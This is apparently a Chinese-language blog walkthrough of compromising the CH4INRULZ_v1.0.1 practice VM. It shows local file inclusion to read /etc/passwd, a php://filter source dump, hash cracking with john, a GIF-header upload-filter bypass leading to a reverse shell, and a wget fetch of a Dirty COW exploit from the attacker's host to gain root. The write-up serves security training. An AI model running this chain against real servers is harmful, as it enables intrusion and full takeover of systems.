美文网首页
CH4INRULZ_v1.0.1渗透实战

CH4INRULZ_v1.0.1渗透实战

作者: 城市烈人 | 来源:发表于2019-01-26 20:45 被阅读0次

CH4INRULZ靶机有点意思,渗透最重要最难的还是信息收集
该靶机作者很用心啊,把文件包含和文件上传很好的结合起来
靶机IP:192.168.8.137

信息收集

nmap -sS -Pn -A -p- -n 192.168.8.137
1

有80和8011两个WEB服务

爆目录发现http://192.168.8.137/development/

2
暂时无解。。。

继续爆8011的web,发现了可疑目录:http://192.168.8.137:8011/api/

3
看来有一些接口配置文件,“Frank's server”,用户应该就是“Frank

文件包含读文件

依次访问这四个php文件,只有file_api.php能访问:http://192.168.8.137:8011/api/files_api.php

4
看来能用file参数读文件

读取/etc/passwd

http://192.168.8.137:8011/api/files_api.php?file=../../etc/passwd

GET读不到


5

burp抓包改POST试试,算了,直接firebug中POST:


6
frank:x:1000:1000:frank,,,:/home/frank:/bin/bash

frank能登录ssh

不过读不到etc/shadow文件

试试用文件包含伪协议以base64加密的形式读取页面源代码,只能读files_api.php

file=php://filter/convert.base64-encode/resource=files_api.php
7

然后在再对代码进行base64解密就可以得到源代码:

<head>
  <title>franks website | simple website browser API</title>
</head>

<?php


$file = $_POST['file'];
include($file);
$get_file = $_GET['file'];

if(isset($get_file)){

echo "<b>********* HACKER DETECTED *********</b>";
echo "<p>YOUR IP IS : ".$_SERVER['REMOTE_ADDR'];
echo "</p><p>WRONG INPUT !!</p>";
break;
}
if(!isset($file)){

echo "<p>No parameter called file passed to me</p>";
echo "<p>* Note : this API don't use json , so send the file name in raw format</p>";

}

/** else{
echo strcmp($file,"/etc/passwd");
echo strlen($file);
echo strlen("/etc/passwd");
if($file == "/etc/passwd"){
        "HACKER DETECTED ..";
        }
}**/
?>

源码中禁止以GET形式读etc/passwd文件,其他的文件也读不到了

80站点中的index.html是网站的主页,但网站还未开发完成,想必会有一个备份数据的文件,尝试访问下index.html.bak

http://192.168.8.137/index.html.bak

可以down下一个index.html.bak文件


8
frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0

登录http://192.168.8.137/development/密码的hash,拿去john解

9
密码frank!!!,登录http://192.168.8.137/development/
10
同时想要登下ssh,失败了

文件上传

有文件上传点http://192.168.8.137/development/uploader/

11
上传php反弹shell
12
白名单限死了JPG, JPEG, PNG & GIF

上传shell.jpg,改后缀再上传


13

改成shell.php上传还是失败,就连上传shell.jpg也失败


14
好了,应该是检验了文件头部,添加头部信息,再上传

GIF98法,再上传gif

15
找下文件上传的路径,包含它,再反弹

既然是myuploads path,那就可能是frankuploads,用户要大写啊,找到上传的路径了:

http://192.168.8.137/development/uploader/FRANKuploads/
16

反弹getshell

files_api.php文件包含以POST方式读上传的反弹马

http://192.168.8.137:8011/api/files_api.php
file=/var/www/development/uploader/FRANKuploads/shell.gif
17

反弹成功:


18

脏牛提权

uname -a查看系统内核版本为2.6,果断想到脏牛,先用python切一下bash

python -c 'import pty;pty.spawn("/bin/bash")'
19

在kali中开启apach服务,靶机上直接wget下载脏牛脚本,找了好久,在tmp中才能写,下载到/tmp

wget http://192.168.8.253/dirty.c
20

编译执行,输入自定义密码:hack

gcc -pthread dirty.c -o dirty -lcrypt
./dirty
21
22

以root / hack 登录

su root
23

get flag:


24

总结

1、该靶机的重点和难点在于信息收集的过程,在80WEB服务中尚未开发完成的网站,利用8011端口WEB的服务找到文件包含读取passwd文件。
2、登录80的web后,找到文件上传,靶机限制了文件的格式和文件的类型大小等。通过修改反弹马的后缀和文件头部信息标识,绕过上传后,用POST读反弹马,反弹getshll。
3、登录后,利用脏牛提权get flag!!!

CH4INRULZ_v1.0.1靶机百度云下载
链接:https://pan.baidu.com/s/1F9OWwRgEXp4nCSerJHu5lw
提取码:84jo

相关文章

  • CH4INRULZ_v1.0.1渗透实战

    CH4INRULZ靶机有点意思,渗透最重要最难的还是信息收集该靶机作者很用心啊,把文件包含和文件上传很好的结合起来...

  • 《Web渗透技术及实战案例解析.pdf》PDF高清完整版-免费下

    《Web渗透技术及实战案例解析.pdf》PDF高清完整版-免费下载 《Web渗透技术及实战案例解析.pdf》PDF...

  • 渗透实战:内网域渗透

    前言 本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使...

  • MERCY渗透实战

    信息收集 开放的端口服务有: smb枚举探测 139和445的共享服务端口,用enum4linux探测一下 发现q...

  • Sedna渗透实战

    靶机IP:192.168.8.153任务:获取4个flag分别在shell,root,还有靶机中 这个靶机开放了好...

  • RootThis渗透实战

    靶机ip:192.168.8.150 nmap扫端口 单单只开放了80 web服务端口 dir爆目录 小字典不够用...

  • eric渗透实战

    靶机IP :192.168.56.103 nmap扫 靶机比较简单,只开启了22和80端口 nmap探测到了192...

  • SolidState渗透实战

    靶机IP:192.168.218.147 nmap全端口扫 靶机开了一些不明端口 跑目录没发现什么 邮箱渗透 nm...

  • HackInOS渗透实战

    HackInOS渗透实战 该靶机很好玩,上马getshell,msf内网穿透,docker提权,简直帅炸了,无奈我...

  • WebDeveloper 渗透实战

    靶机IP:192.168.56.104 kali IP:192.168.56.101 nmap全扫 web渗透 既...

网友评论

      本文标题:CH4INRULZ_v1.0.1渗透实战

      本文链接:https://www.haomeiwen.com/subject/mtoijqtx.html